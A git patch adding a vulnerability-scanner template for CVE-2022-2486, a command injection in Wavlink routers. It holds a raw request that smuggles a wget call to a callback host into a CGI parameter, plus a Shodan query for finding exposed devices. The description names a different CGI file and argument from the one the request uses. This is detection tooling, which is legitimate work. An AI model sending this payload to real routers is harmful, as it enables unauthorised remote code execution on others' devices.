From a55bf33f1734dd7ca03d7ca83a5b6ccad51867f2 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=9E=97=E5=AF=92?=
 <57119052+For3stCo1d@users.noreply.github.com>
Date: Thu, 21 Jul 2022 02:14:49 +0800
Subject: [PATCH] Create CVE-2022-2486.yaml

---
 cves/2022/CVE-2022-2486.yaml | 26 ++++++++++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 cves/2022/CVE-2022-2486.yaml

diff --git a/cves/2022/CVE-2022-2486.yaml b/cves/2022/CVE-2022-2486.yaml
new file mode 100644
index 0000000000..06f980f5b2
--- /dev/null
+++ b/cves/2022/CVE-2022-2486.yaml
@@ -0,0 +1,26 @@
+id: CVE-2022-2486
+
+info:
+  name: Wavlink Mesh.cgi - RCE
+  author: For3stCo1d
+  severity: critical
+  description: | 
+    A vulnerability, which was classified as critical, was found in WAVLINK WN535K2 and WN535K3. This affects an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade. The manipulation of the argument key leads to os command injection. The exploit has been disclosed to the public and may be used.
+  reference:
+    - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20mesh.cgi.md
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2486
+  metadata:
+    shodan-query: http.title:"Wi-Fi APP Login"
+  tags: cve,cve2022,iot,wavlink,router
+
+requests:
+  - raw:
+      - |
+        GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the HTTP Interaction
+        words:
+          - "http"